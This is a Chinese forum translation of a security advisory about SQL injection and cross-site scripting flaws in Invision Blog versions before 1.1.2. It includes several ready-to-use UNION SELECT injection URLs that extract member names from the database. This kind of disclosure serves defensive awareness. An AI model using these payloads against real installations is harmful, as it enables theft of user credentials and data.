[翻译]Invision Blog sql注入和跨站脚本漏洞
资料翻译:fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
厂商 : Invision Power Services
网址 : http:// [url]www.invisionblog.com[/url]
版本 : 在1.1.2 之前的所有版本
漏洞发布:GulfTech Security Research
描述:
Invision Blog 是基于blogging 的软件,
集成了Invision 控制面板。 存在sql注
入和跨站脚本漏洞。利用这些漏洞攻击者
可以得到一些敏感信息 , 像密码和浏览
者的cookie。
CSS:
攻击者在用户浏览器里提交客户端代码,
convert_highlite_words()函数数据过滤不严。
urldecode()函数返回一些敏感数据。
SQL 注入:
[url]http://localhost/index.php?automodule=blog&blogid=1&cmd=edit[/url]
entry&eid=99
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%2
0FROM%20ibf_
members%20WHERE%201/*
[url]http://localhost/index.php?automodule=blog&blogid=1&cmd=repl[/url]
yentry&eid=99
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%2
0FROM%20ibf_
members%20WHERE%201/*
[url]http://localhost/index.php?automodule=blog&blogid=1&cmd=edit[/url]
comment&eid=1&
cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20
FROM%20ibf_
members%20WHERE%201/*
[url]http://localhost/index.php?automodule=blog&blogid=1&cmd=abou[/url]
tme&mid=2'
页:
[1]